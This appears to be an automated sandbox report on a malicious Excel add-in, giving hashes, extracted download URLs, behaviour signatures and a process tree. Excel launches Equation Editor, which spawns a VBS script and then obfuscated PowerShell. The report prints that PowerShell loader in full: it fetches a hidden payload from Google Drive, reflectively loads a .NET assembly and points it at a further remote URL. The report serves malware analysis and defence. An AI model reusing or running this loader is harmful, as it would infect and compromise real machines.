Analysis
-
max time kernel
117s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
22-10-2024 01:10
Static task
static1
Behavioral task
behavioral1
Sample
5dd806fc72d207069c7bd891704426a5d457c96c4c240080da0eaa53cd32535b.xlam
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
5dd806fc72d207069c7bd891704426a5d457c96c4c240080da0eaa53cd32535b.xlam
Resource
win10v2004-20241007-en
General
-
Target
5dd806fc72d207069c7bd891704426a5d457c96c4c240080da0eaa53cd32535b.xlam
-
Size
730KB
-
MD5
198c709b7725cb126accf23c7758f4b5
-
SHA1
f503ff807d067968dea7b5ad5ee990eb0f21b374
-
SHA256
5dd806fc72d207069c7bd891704426a5d457c96c4c240080da0eaa53cd32535b
-
SHA512
ef3107a2df4b259d1ab480cbfdd29ccff38c01db2989e8f37de2dde290f7dea7860b6aae31d0becbe3864e9490df08793451d75b543d3d90f0fa454a391115b3
-
SSDEEP
12288:8UkuUmH9/U+RW3VPyOf/3RtDwTHjnTdM7dm2336UEPL3BVI4lt85DxMcaZ4eBytu:85uUg9d0hb/Bt0TLOYjTXI4qxMcgyZfu
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=17kQITFJZ1tqdqTVyc8JyKCRsAb083F4G
https://drive.google.com/uc?export=download&id=17kQITFJZ1tqdqTVyc8JyKCRsAb083F4G
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 5 2176 EQNEDT32.EXE 7 2780 powershell.exe 9 2780 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2624 powershell.exe 2780 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 6 drive.google.com 7 drive.google.com -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EQNEDT32.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
pid Process 2176 EQNEDT32.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 600 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2624 powershell.exe 2780 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2624 powershell.exe Token: SeDebugPrivilege 2780 powershell.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 600 EXCEL.EXE 600 EXCEL.EXE 600 EXCEL.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2176 wrote to memory of 2884 2176 EQNEDT32.EXE 32 PID 2176 wrote to memory of 2884 2176 EQNEDT32.EXE 32 PID 2176 wrote to memory of 2884 2176 EQNEDT32.EXE 32 PID 2176 wrote to memory of 2884 2176 EQNEDT32.EXE 32 PID 2884 wrote to memory of 2624 2884 WScript.exe 33 PID 2884 wrote to memory of 2624 2884 WScript.exe 33 PID 2884 wrote to memory of 2624 2884 WScript.exe 33 PID 2884 wrote to memory of 2624 2884 WScript.exe 33 PID 2624 wrote to memory of 2780 2624 powershell.exe 35 PID 2624 wrote to memory of 2780 2624 powershell.exe 35 PID 2624 wrote to memory of 2780 2624 powershell.exe 35 PID 2624 wrote to memory of 2780 2624 powershell.exe 35
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\5dd806fc72d207069c7bd891704426a5d457c96c4c240080da0eaa53cd32535b.xlam1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:600
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2176 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\medicallaboratory.vbs"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2884 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWVYICgoJ21CUScrJ2ltYWdlVXJsID0gQnJ0aHR0cHM6JysnLy9kcml2ZS5nb29nbGUuY28nKydtL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xN2tRSVRGSloxdHFkcVRWeWM4SnlLQ1JzQWIwODNGNEcgQnJ0O21CUXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzJysndGVtLk5ldC5XZScrJ2JDbGllbnQ7bUJRaW1hZ2VCeXRlcyA9IG1CUXdlYkNsaWVudC5Eb3dubG9hZERhdGEobUJRaW1hZ2UnKydVcmwpO21CUWltYWdlVGV4dCA9IFtTeXN0ZScrJ20uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG1CUWltYWdlQnl0ZXMpO21CUXN0YXJ0RmxhZyA9IEJydDw8QkFTRTY0X1NUQVJUPj5CcnQ7bUJRZW5kRmxhZyA9IEJydDw8QkFTRTY0X0VORD4+QnJ0O21CUXN0YXJ0SW5kZXggPSBtQlFpbWFnZVRleHQuSW5kZXhPZihtQlFzdGFydEZsYWcpO21CUWVuZEluZGV4ID0gbUJRaW1hZ2VUZXh0LkluZGV4T2YobUJRZW5kRmxhZyk7bUJRc3RhJysncnRJbmRleCAtZ2UgMCAtYW5kIG1CUWVuZEluZGV4JysnIC1ndCBtQlFzdGFydEluZGV4O21CUXN0YXJ0SW5kZXgnKycgKz0gbUJRc3RhcnRGbGFnLkxlbmd0aDttQlFiYXNlNjRMZW5ndGggPSBtQlFlbmRJbmRleCAtIG1CUXN0YXJ0SW5kZXg7bUJRYmFzZScrJzY0Q29tbWFuZCA9IG1CUWltYWdlVGV4dC5TdWJzdHJpbmcobUJRc3RhcnRJbmRleCwgbUJRYmFzZTY0TGVuZ3RoKTttQlFiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChtQlFiJysnYXNlNjRDb21tYW5kLlRvQ2hhckFyJysncmF5KCkgc0l6IEZvckVhJysnY2gtT2JqJysnZWN0IHsgbUJRXyB9KVstMS4uLShtQicrJ1FiYXNlNicrJzRDJysnb21tYW5kLkxlbmd0aCldO21CUWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcobUJRYmFzZTY0UmUnKyd2ZXJzZWQpO21CUWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzJysnc2VtYmx5XTo6TG9hZChtQlFjb21tYW5kQnl0ZXMpO21CUXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoQnJ0VkFJQnJ0KTttQlF2YWlNZXRob2QuSW52b2tlKG1CUW51bGwsIEAoQnJ0dHh0LmJiYmJiYmJiYmJiZXdtYWRhbS9ncm8uc25ka2N1ZC5yZWdhbmFtbGEnKydjb2x5YWRpcmYvLycrJzpwdHRoQnJ0LCBCcnRkZXNhdGl2YWRvQnJ0LCBCcnRkZXNhdGl2YWRvQnJ0LCBCcnRkZXNhdGl2YWRvQnJ0LCBCcnRBZGRJJysnblByb2Nlc3MzMkJydCwgQnJ0ZGVzYXRpdmFkb0JydCwgQnJ0ZGVzYXRpdmFkb0JydCknKycpOycpLlJFUExhY2UoJ21CUScsW1NUUmluR11bY0hBcl0zNikuUkVQTGFjZSgoW2NIQXJdNjYrW2NIQXJdMTE0K1tjSEFyXTExNiksW1NUUmluR11bY0hBcl0zOSkuUkVQTGFjZSgoW2NIQXJdMTE1K1tjSEFyXTczK1tjSEFyXTEyMiksJ3wnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2624 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "IeX (('mBQ'+'imageUrl = Brthttps:'+'//drive.google.co'+'m/uc?export=download&id=17kQITFJZ1tqdqTVyc8JyKCRsAb083F4G Brt;mBQwebClient = New-Object Sys'+'tem.Net.We'+'bClient;mBQimageBytes = mBQwebClient.DownloadData(mBQimage'+'Url);mBQimageText = [Syste'+'m.Text.Encoding]::UTF8.GetString(mBQimageBytes);mBQstartFlag = Brt<<BASE64_START>>Brt;mBQendFlag = Brt<<BASE64_END>>Brt;mBQstartIndex = mBQimageText.IndexOf(mBQstartFlag);mBQendIndex = mBQimageText.IndexOf(mBQendFlag);mBQsta'+'rtIndex -ge 0 -and mBQendIndex'+' -gt mBQstartIndex;mBQstartIndex'+' += mBQstartFlag.Length;mBQbase64Length = mBQendIndex - mBQstartIndex;mBQbase'+'64Command = mBQimageText.Substring(mBQstartIndex, mBQbase64Length);mBQbase64Reversed = -join (mBQb'+'ase64Command.ToCharAr'+'ray() sIz ForEa'+'ch-Obj'+'ect { mBQ_ })[-1..-(mB'+'Qbase6'+'4C'+'ommand.Length)];mBQcommandBytes = [System.Convert]::FromBase64String(mBQbase64Re'+'versed);mBQloadedAssembly = [System.Reflection.As'+'sembly]::Load(mBQcommandBytes);mBQvaiMethod = [dnlib.IO.Home].GetMethod(BrtVAIBrt);mBQvaiMethod.Invoke(mBQnull, @(Brttxt.bbbbbbbbbbbewmadam/gro.sndkcud.reganamla'+'colyadirf//'+':ptthBrt, BrtdesativadoBrt, BrtdesativadoBrt, BrtdesativadoBrt, BrtAddI'+'nProcess32Brt, BrtdesativadoBrt, BrtdesativadoBrt)'+');').REPLace('mBQ',[STRinG][cHAr]36).REPLace(([cHAr]66+[cHAr]114+[cHAr]116),[STRinG][cHAr]39).REPLace(([cHAr]115+[cHAr]73+[cHAr]122),'|'))"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2780
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD566ecf26784802c8ce7a6741ae7ac99c6
SHA168fd7f02d6b6c16c1a8ec62007af88d404751ad9
SHA256b030f2258888f98b5a83e6575ae26719cfe27072ca531449a4d614a91e117eab
SHA512e5c00c543fa1e99c778f91cc0fe5fa8327ad4669eaaa8b4b54dd1032a921d912de7b74c6506d21a6674b06fd77e8c054ef40abbbb7e420ecc6a68ba03bb88c5c
-
Filesize
192KB
MD51e74a1e9b214a5e7de05d71bc03849e8
SHA14313868bae215573da78b467d5a7390a6a86117c
SHA25601eed58d2c0ff62733000b76b6ab80124480f5af9195a33c3157c60df2f3cd80
SHA5123fcb390d7bae3e6d0ae3e0cc4d50825a27872930633747bbcc07e75ccbb2d392336fe8cb6267ca2bbf05b88002249b7d41a9eb9f8559d719058fda18d90ef4af